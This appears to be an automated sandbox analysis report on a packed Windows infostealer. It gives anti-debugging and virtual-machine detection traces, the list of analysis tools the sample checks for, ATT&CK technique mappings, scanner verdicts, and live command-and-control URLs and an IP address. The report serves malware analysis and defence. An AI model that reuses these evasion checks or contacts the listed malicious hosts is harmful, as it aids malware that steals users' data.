    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F011CA second address: 6F012AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 pushfd 0x00000013 jmp 00007FB418E0AE83h 0x00000018 and ch, FFFFFFEEh 0x0000001b jmp 00007FB418E0AE89h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+08h] 0x00000025 pushad 0x00000026 mov di, si 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop edi 0x0000002c push eax 0x0000002d pop edi 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [edx+08h], eax 0x00000033 jmp 00007FB418E0AE7Ch 0x00000038 mov eax, dword ptr [esi+0Ch] 0x0000003b jmp 00007FB418E0AE80h 0x00000040 mov dword ptr [edx+0Ch], eax 0x00000043 jmp 00007FB418E0AE80h 0x00000048 mov eax, dword ptr [esi+10h] 0x0000004b jmp 00007FB418E0AE80h 0x00000050 mov dword ptr [edx+10h], eax 0x00000053 jmp 00007FB418E0AE80h 0x00000058 mov eax, dword ptr [esi+14h] 0x0000005b jmp 00007FB418E0AE80h 0x00000060 mov dword ptr [edx+14h], eax 0x00000063 jmp 00007FB418E0AE80h 0x00000068 mov eax, dword ptr [esi+18h] 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F012AB second address: 6F012AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F012AF second address: 6F012B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F012B5 second address: 6F012BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F012BB second address: 6F012BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F012BF second address: 6F0132B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+18h], eax 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007FB418AEFE4Ah 0x00000017 jmp 00007FB418AEFE55h 0x0000001c popfd 0x0000001d popad 0x0000001e mov eax, dword ptr [esi+1Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FB418AEFE56h 0x0000002a or esi, 2AEAE0D8h 0x00000030 jmp 00007FB418AEFE4Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F0132B second address: 6F01382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB418E0AE7Ch 0x00000013 or cl, 00000068h 0x00000016 jmp 00007FB418E0AE7Bh 0x0000001b popfd 0x0000001c call 00007FB418E0AE88h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01382 second address: 6F01391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+20h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01391 second address: 6F01395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01395 second address: 6F0139B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F0139B second address: 6F013B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F013B3 second address: 6F013B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F013B7 second address: 6F013D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F014CD second address: 6F014D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F014D3 second address: 6F014F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F014F4 second address: 6F014F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F014F8 second address: 6F01515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01515 second address: 6F01594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB418AEFE59h 0x00000015 popad 0x00000016 test ecx, 00000700h 0x0000001c pushad 0x0000001d jmp 00007FB418AEFE4Ch 0x00000022 mov bl, al 0x00000024 popad 0x00000025 jne 00007FB48716DFFCh 0x0000002b jmp 00007FB418AEFE4Dh 0x00000030 or dword ptr [edx+38h], FFFFFFFFh 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB418AEFE58h 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01594 second address: 6F01598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01598 second address: 6F0159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F50CBF second address: 6F50CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 2167C8FBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F50CD7 second address: 6F50D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx eax, bx 0x0000000f pushfd 0x00000010 jmp 00007FB418AEFE57h 0x00000015 or ah, FFFFFF8Eh 0x00000018 jmp 00007FB418AEFE59h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF062C second address: 6EF0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF0630 second address: 6EF0636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF0636 second address: 6EF063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF063C second address: 6EF0640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF0640 second address: 6EF0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF0644 second address: 6EF0673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, FEh 0x0000000e pushfd 0x0000000f jmp 00007FB418AEFE50h 0x00000014 add cl, FFFFFF88h 0x00000017 jmp 00007FB418AEFE4Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF0673 second address: 6EF06EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB418E0AE81h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB418E0AE7Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FB418E0AE7Dh 0x00000020 add al, FFFFFFB6h 0x00000023 jmp 00007FB418E0AE81h 0x00000028 popfd 0x00000029 jmp 00007FB418E0AE80h 0x0000002e popad 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF06EA second address: 6EF06FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6EF06FC second address: 6EF0700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6E90008 second address: 6E9000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6E9000C second address: 6E90026 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Special instruction interceptor: First address: 884A74 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Special instruction interceptor: First address: A43D3A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Special instruction interceptor: First address: A277A8 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Special instruction interceptor: First address: AB4677 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_00409980 rdtsc 1_2_00409980
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | File Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_002229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_002229FF
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: FYQ6Ee6gbS.exe | Binary or memory string: Hyper-V RAW
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1553449105.000000000154F000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553280122.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553420460.0000000001542000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553597633.000000000155D000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000002.1588659047.000000000155E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | System information queried: ModuleInformation
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Process information queried: ProcessInformation

    Anti Debugging

    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | File opened: NTICE
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | File opened: SICE
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | File opened: SIWVID
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_00409980 rdtsc 1_2_00409980
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: *'@vProgram Manager
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: o*'@vProgram Manager
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

    Stealing of Sensitive Information

    Source: Yara match | File source: Process Memory Space: FYQ6Ee6gbS.exe PID: 7508, type: MEMORYSTR
    Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
    Source: global traffic | TCP traffic: 192.168.2.8:49706 -> 176.53.147.104:80

    Remote Access Functionality

    Source: Yara match | File source: Process Memory Space: FYQ6Ee6gbS.exe PID: 7508, type: MEMORYSTR
    ATT&CK matrix, listed per tactic (a leading number is the count shown beside that technique in the report):
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
    Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: 11 Encrypted Channel; 4 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

    Source | Detection | Scanner | Label
    FYQ6Ee6gbS.exe | 50% | Virustotal |
    FYQ6Ee6gbS.exe | 71% | ReversingLabs | Win32.Infostealer.Tinba
    FYQ6Ee6gbS.exe | 100% | Avira | TR/Crypt.TPM.Gen
    FYQ6Ee6gbS.exe | 100% | Joe Sandbox ML |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4 | 100% | Avira URL Cloud | malware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767 | 100% | Avira URL Cloud | malware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17 | 100% | Avira URL Cloud | malware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0 | 100% | Avira URL Cloud | malware
    home.fivetj5vs.top | 100% | Avira URL Cloud | malware
    gPhome.fivetj5vs.top | 100% | Avira URL Cloud | malware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvI | 100% | Avira URL Cloud | malware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBd | 100% | Avira URL Cloud | malware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963 | 100% | Avira URL Cloud | malware
    home.fivetj5vs.tops.top | 0% | Avira URL Cloud | safe
    .1.1home.fivetj5vs.top | 100% | Avira URL Cloud | malware
    a.dnspod.coms.top | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    home.fivetj5vs.top | 176.53.147.104 | true | true | | unknown
    httpbin.org | 50.19.58.113 | true | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    home.fivetj5vs.tops.top | true | Avira URL Cloud: safe | unknown
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767 | true | Avira URL Cloud: malware | unknown
    home.fivetj5vs.top | true | Avira URL Cloud: malware | unknown
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0 | true | Avira URL Cloud: malware | unknown
    gPhome.fivetj5vs.top | true | Avira URL Cloud: malware | unknown
    https://httpbin.org/ip | false | | high
    a.dnspod.coms.top | true | Avira URL Cloud: safe | unknown
    .1.1home.fivetj5vs.top | true | Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://curl.se/docs/hsts.html | FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://html4/loose.dtd | FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    https://curl.se/docs/alt-svc.html# | FYQ6Ee6gbS.exe | false | | high
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17 | FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://httpbin.org/ipbefore | FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    https://curl.se/docs/http-cookies.html | FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4 | FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963 | FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://curl.se/docs/hsts.html# | FYQ6Ee6gbS.exe | false | | high
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBd | FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
    https://curl.se/docs/http-cookies.html# | FYQ6Ee6gbS.exe | false | | high
    https://curl.se/docs/alt-svc.html | FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://.css | FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://.jpg | FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvI | FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.53.147.104 | home.fivetj5vs.top | United Kingdom | 35791 | VANNINVENTURESGB | true
50.19.58.113 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588874
Start date and time: 2025-01-11 06:35:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 34s
